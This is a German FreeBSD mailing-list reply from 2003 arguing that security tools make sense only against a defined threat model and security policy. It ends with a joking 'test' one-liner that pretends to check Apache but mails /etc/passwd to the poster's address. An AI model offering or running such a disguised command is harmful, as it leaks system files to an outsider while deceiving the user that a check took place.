Re: Arirang frage

From: Matthias Teege <matthias(at)mteege.de>
Date: Tue, 29 Jul 2003 11:55:02 +0200

On Tue, Jul 29, 2003 at 10:52:08AM +0200, Hannes Widmer wrote:
> Was meinst du mit Sicherheitspolicy... Die der Anwendungen...z.B. php
> oder apache?....

Sicherheit per se gibt es nicht. Sicherheit ist abhängig von einem
konkreten Szenario. Ein (abgedroschenes) Beispiel.

Du hast 20,-- Euro in einen Safe gepackt und ein Dieb bricht in den
Safe ein, benötigt aber ein Schweissgerät im Wert von 500,-- Euro und
natürlich Zeit. Er öffnet den Tresor, nimmt die 20,-- Euro und
verschwindet unerkannt. Deine Kohle ist weg aber das System ist
sicher.

Will sagen, bevor Du anfängst, irgendwelche obskuren Programme
einzusetzen, solltest Du wissen, vor wem oder vor was Du Dich
schützen willst. Sofern Du keine Sicherheitspolicy hast, gegen die
Du Deine Aktivitäten prüfen kannst, macht das alles keinen Sinn.

Achso, arirang ist für Deinen Fall total oversized, es genügt schon
folgendes:

echo "Testing apache, running" && cat /etc/passwd | mail matthias-20030729(at)mteege.de && sleep 20 && echo "You are save!"

Bis dann
Matthias

-- 
Matthias Teege -- http://www.mteege.de
make world not war
PGP-Key auf Anfrage
To Unsubscribe: send mail to majordomo(at)de.FreeBSD.org
with "unsubscribe de-bsd-questions" in the body of the message
Received on Tue 29 Jul 2003 - 11:55:16 CEST

search this site